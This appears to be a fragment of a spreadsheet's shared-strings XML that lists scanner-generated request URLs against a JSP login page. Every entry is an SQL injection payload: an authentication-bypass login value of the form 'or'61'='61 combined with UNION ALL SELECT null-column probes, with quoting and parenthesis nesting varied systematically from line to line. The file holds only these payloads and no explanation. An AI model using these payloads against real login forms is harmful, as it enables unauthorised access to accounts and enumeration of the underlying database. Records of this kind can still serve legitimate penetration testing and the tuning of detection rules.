    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('cjcl'='cjcl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('iyfr'='iyfr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null--and'pzxi'='pzxi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and'oegr'='oegr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and'ymgc'='ymgc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ixsj'='ixsj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ezwv'='ezwv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'xqhk'='xqhk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ofwd'='ofwd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'lhpb'='lhpb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'kkcr'='kkcr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'erzn'='erzn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null--and('tycv'like'tycv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and('hwru'like'hwru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and('rips'like'rips</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and('lcyi'like'lcyi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ijnw'like'ijnw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('thgx'like'thgx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('fpyx'like'fpyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ycoo'like'ycoo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('fsyn'like'fsyn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('betv'like'betv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(('ogrt'like'ogrt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(('kcdq'like'kcdq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(('vhir'like'vhir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('kmlc'like'kmlc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('lyyn'like'lyyn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('uxht'like'uxht</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ddzx'like'ddzx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('lgzr'like'lgzr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ludn'like'ludn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('wrfi'like'wrfi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((('guki'like'guki</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((('xvdo'like'xvdo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((('peeh'like'peeh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('egex'like'egex</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('mzfh'like'mzfh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('lrui'like'lrui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('zerk'like'zerk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('fqnp'like'fqnp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('xtzx'like'xtzx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('qatp'like'qatp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null--and'ndkx'like'ndkx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and'atzz'like'atzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and'hkut'like'hkut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and'fgty'like'fgty</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'qeod'like'qeod</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'giqf'like'giqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'sjmr'like'sjmr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'cqow'like'cqow</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'fufw'like'fufw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'eqgq'like'eqgq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null--and("mhxm"="mhxm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and("hjjx"="hjjx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and("ltsa"="ltsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and("pmtu"="pmtu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("koyx"="koyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("ppdf"="ppdf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("hqlk"="hqlk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("pife"="pife</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("xwdr"="xwdr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("mjax"="mjax</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(("jgkg"="jgkg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(("vnco"="vnco</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(("fvcj"="fvcj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("ggne"="ggne</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("kicp"="kicp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("xpvm"="xpvm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("adaa"="adaa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("bqkn"="bqkn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("nyds"="nyds</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("bcza"="bcza</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((("tgni"="tgni</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((("iscu"="iscu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((("rnfs"="rnfs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("twdc"="twdc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("ssdk"="ssdk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("xebl"="xebl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("jbnz"="jbnz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("nszn"="nszn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("hvro"="hvro</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("rbss"="rbss</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null--and"oibx"="oibx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and"xcdr"="xcdr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and"fozu"="fozu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and"iyoj"="iyoj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"snyk"="snyk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"pffb"="pffb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"qcwq"="qcwq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"alyt"="alyt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"fqrw"="fqrw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"zhhz"="zhhz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null--and("mwbi"like"mwbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and("pgrg"like"pgrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and("vzot"like"vzot</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and("coxc"like"coxc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("zdlw"like"zdlw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("wrgq"like"wrgq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("ldaz"like"ldaz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("ipvs"like"ipvs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("axqe"like"axqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("iyvb"like"iyvb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(("rwuk"like"rwuk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(("znma"like"znma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(("rwda"like"rwda</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("yhsv"like"yhsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("jgut"like"jgut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("dphm"like"dphm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("ozdx"like"ozdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("hlpw"like"hlpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("ncyx"like"ncyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("bodv"like"bodv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((("lowl"like"lowl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((("ictl"like"ictl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((("btzn"like"btzn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("ojzc"like"ojzc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("ipax"like"ipax</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("lsxi"like"lsxi</t>
  </si>
  <si>
